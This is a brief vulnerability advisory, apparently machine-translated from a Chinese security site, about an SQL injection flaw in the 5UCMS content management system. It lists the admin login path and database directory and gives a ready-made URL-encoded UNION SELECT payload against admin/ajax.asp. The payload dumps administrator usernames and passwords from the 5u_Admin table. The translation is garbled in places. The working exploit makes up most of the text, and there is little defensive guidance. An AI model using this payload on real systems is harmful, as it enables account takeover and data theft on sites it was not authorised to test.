Worry-free network article management system 5UCMS)injection vulnerability-vulnerability warning-the black bar safety net

2012-05-11T00:00:00
ID MYHACK58:62201233847
Type myhack58
Reporter 佚名
Modified 2012-05-11T00:00:00

Description

Background address: admin/Login. asp

!

The database path: inc/db directory

Vulnerabilityaddress:

admin/ajax. asp? Act=modeext&cid=1%20and%2 0 1=2%20UNION%20select%2 0 1 1 1%26Chr(1 3)%26Chr(1 0)%26username%26chr(5 8)%2 6 1%26Chr(1 3)%26Chr(1 0)%26password%26chr(5 8)%20from 5u_Admin&id=1%20and%2 0 1=2%20UNION%20select%2 0 1%20from 5u_Admin Obtain a backstage account and password

!